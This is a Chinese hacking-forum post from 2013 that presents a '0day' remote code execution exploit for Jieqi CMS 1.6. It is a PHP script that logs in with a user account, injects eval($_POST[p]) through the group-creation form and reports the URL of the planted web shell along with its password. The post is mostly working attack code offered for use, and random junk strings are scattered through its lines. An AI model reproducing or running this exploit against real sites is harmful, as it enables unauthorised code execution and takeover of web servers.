找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2209|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
7 q# W1 m8 D& L2 z
2 L( y% @  x8 ~8 H
& W$ P# t. x3 @0 }" ?4 @5 [该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。! I1 a9 R" `4 T  ~5 R
需要有一个能创建圈子的用户。
5 f: B6 m/ v, ?5 O7 K
- ~. R8 `# O# I* q( V% I<?php
  c" _! S; m' Y3 W& F) L" l; s1 J7 R1 u 3 Z1 X: `% Q: p: p) g
print_r('
+ ?2 B7 C$ }/ E+---------------------------------------------------------------------------+
) Q4 k/ k' H: O) W- X4 QJieqi CMS V1.6 PHP Code Injection Exploit
: i" _+ m& D5 l8 d( vby flyh4t/ ]! S, ?2 d! L" g$ O& j+ a
mail: phpsec at hotmail dot com  [" z7 O) p  z6 L
team: http://www.wolvez.org
6 o; H% }; @, F$ y3 w+---------------------------------------------------------------------------+2 {8 |' G1 j/ ?4 e
'); /**( V! p$ M4 b0 N
* works regardless of php.ini settings$ A) q7 R! t. j2 m+ D# f0 x, P" V+ \
*/ if ($argc < 5) { print_r('' F$ t" u; L( E( }5 Z
+---------------------------------------------------------------------------+; i! n! v) b* h6 v+ W  O
Usage: php '.$argv[0].' host path username  {! ?7 e9 n+ u6 L! T
host:      target server (ip/hostname)/ T. x- k$ a7 `
path:      path to jieqicms
! V! M. S- @# t3 buasename:  a username who can create group: u0 \; [. O2 x: b
Example:' U; |1 Q( _6 j' e6 L! J
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password. r5 N" ~) I1 T8 S
+---------------------------------------------------------------------------+7 J5 v4 R. F; \1 q. N2 e
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961) R* W2 M1 @# N: q1 }
Content-Disposition: form-data; name="gname"
) O0 v, f& ~7 p! `& J$ k   v, T  c1 e7 \8 {5 X9 l
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t; F+ Z  E) _  k
-----------------------------23281168279961
5 g  l! `# P( J# ]6 ^( IContent-Disposition: form-data; name="gcatid"
! N1 N5 J. I( a( L1 G 0 P7 V, M, G! O6 f$ s) G% \
1
9 U3 J( D" `6 M& n; ]$ }* o$ p) _4 I-----------------------------23281168279961
2 ~+ r' F" I: K9 ^3 G  U) K$ y; iContent-Disposition: form-data; name="gaudit"/ I, c, \% K. J! p9 x

2 R) m0 _8 z" D+ n) w  e1 V$ V; c" O1* ?" G# {. I- _
-----------------------------23281168279961
6 I/ e" D, S2 l( H. Q* u# i7 rContent-Disposition: form-data; name="gbrief"+ U' k+ S/ a( {* y' n
3 I8 K" v3 \, d8 |; l. U; G5 G
1; K+ m, e- K  U; C
-----------------------------23281168279961--7 k' T, b; Z7 K! K! p+ }
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
4 B" j1 T, K6 x0 x( v, m3 d
, p% P% g% R% i# l/ w$ r% G* `preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表